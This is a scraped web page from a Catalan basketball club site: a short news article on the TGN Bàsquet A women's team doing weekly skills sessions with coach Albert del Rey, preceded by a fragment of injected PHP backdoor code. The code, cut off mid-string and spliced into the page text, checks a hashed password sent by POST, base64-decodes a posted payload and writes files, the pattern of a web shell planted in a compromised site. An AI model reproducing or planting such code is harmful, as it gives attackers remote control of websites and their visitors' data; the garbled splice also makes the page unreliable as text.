function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Les jugadores del TGN Bàsquet A realitzen sessions de tecnificació setmanals - Tgn Bàsquet Club -

Les jugadores del TGN Bàsquet A realitzen sessions de tecnificació setmanals

By
Updated: octubre 22, 2015

Sempre hi ha marge de millora. No cal ser infantil, cadet o júnior per haver d’aprendre, tenir cada vegada millors prestacions. Amb aquesta màxima, les jugadores del TGN Bàsquet A realitzen, des de fa tres setmanes, sessions de tecnificació sota les ordres de l’entrenador Albert del Rey. Aquestes sessions, que s’adapten segons la disponibilitat de les noies -moltes treballen o estudien- serveixen per polir aquells aspectes individuals que, sovint, en els entrenaments de grup no es poden treballar.

Dues de les habituals en aquests entrenaments voluntaris són els dos fitxatges del curs, la base Analía Casado i la nord-americana Olivia (Livy) Fouty. Com a professionals que són, no es perden una sessió i el bon ambient predomina sobre la pista perquè s’ha de recordar que ambdues jugadores viuen juntes. “Som-hi”, diu Livi Fouty abans d’acabar la sessió de tecnificació que sempre finalitza amb tirs. “Em va preguntar com es deia Let’s go en català, i ara ho diu sempre”, explica divertit Albert del Rey. Fouty i Analía es van animant a mesura que van fent els exercicis i es marquen reptes més enllà dels que els pugui exigir el tècnic.

Ambues, però, no són les úniques que sovintegen aquestes sessions. L’escorta Laura Tierno i la base Laura Pascual també hi van sempre que poden, tot i que, depenent de la seva disponibilitat laboral, en una altra franja horària. “Depèn de com ho tenim. El més habitual és que ho fem els dijous, al matí al Serrallo i a la tarda al Sagrat Cor. Si s’ha de canviar de dia, el canviem”, explica del Rey.

El tècnic lila té molt clar el que vol aconseguir amb aquestes sessions per a jugadores sèniors. Busca un domini total de la pilota, una relació estreta entre el cos de la jugadora i la bimba. “M’he plantejat durant aquest trimestre el tema del bot i del dribbling, i sobretot el domini de pilota, en què estic una mica obsessionat perquè considero que si la jugadora pot tenir un control absolut sobre la bimba, pot millorar molt les seves prestacions. També treballem el tir”, diu.

Entre bromes, rialles, jocs de pilota i demostració d’habilitats vàries, s’acaba una sessió de tecnificació més al pavelló del Sagrat Cor. Les noies han sumat una hora més a la seva preparació. Això les farà millors i l’equip se’n beneficiarà.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *